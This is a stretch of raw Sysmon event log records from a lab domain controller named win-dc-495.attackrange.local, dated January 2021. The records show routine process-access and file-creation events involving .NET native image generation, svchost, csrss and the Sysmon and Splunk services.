13:49:46.526{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.526{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.526{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.495{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b94-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-18 13:49:46.495 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.401{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.401{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.401{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.370{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.354{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.354{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.339{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9b4-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-18 13:49:46.339 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.245{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.229{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.229{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.167{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.151{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.151{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.120{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11fc-0\Microsoft.GroupPolicy.Management.dll2021-01-18 13:49:46.120 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.104{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
